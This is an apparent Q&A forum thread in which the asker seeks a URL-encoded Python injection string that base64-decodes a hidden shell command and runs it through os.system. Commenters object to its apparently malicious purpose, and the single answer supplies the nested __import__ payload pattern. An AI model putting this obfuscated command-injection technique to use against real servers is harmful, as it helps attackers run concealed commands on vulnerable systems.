# how to execute a base64 string

Tags: python, url

i am trying to understand how to combine these two functions, so that my final command will be base64decoded.

```
"%2Bstr(__import__('base64').b64decode('bHM=')%2B"
```

as a command like so

```
"%2Bstr(__import__('os').system.b64decode('bHM=')%2B"
```

in other words, how can the os.system and base64.b64decode be used together?

or perhaps something like

```
"%2Bstr(__import__('os').system('bHM=').b64decode())%2B"
```

Comment: I know we're supposed to presume good faith here, but I can't think of a reason of obfuscate a call to `os.system()` outside of malicious code.  What is it precisely that you're trying to accomplish?

Comment: Ah, so this _is_ to help you with malicious code.  I'll move on, then.

Comment: I'm voting to close this question as off-topic because we don't do malicious code

Comment: @WouterVerhelst [There is no such rule against “malicious code”.](https://unix.meta.stackexchange.com/questions/4815/how-to-handle-questions-with-apparent-malicious-intent)

Answer (score 0):

Here is the solution.

The import module can be called twice.

```
(__import__('os').system(__import__('base64').b64decode()))
```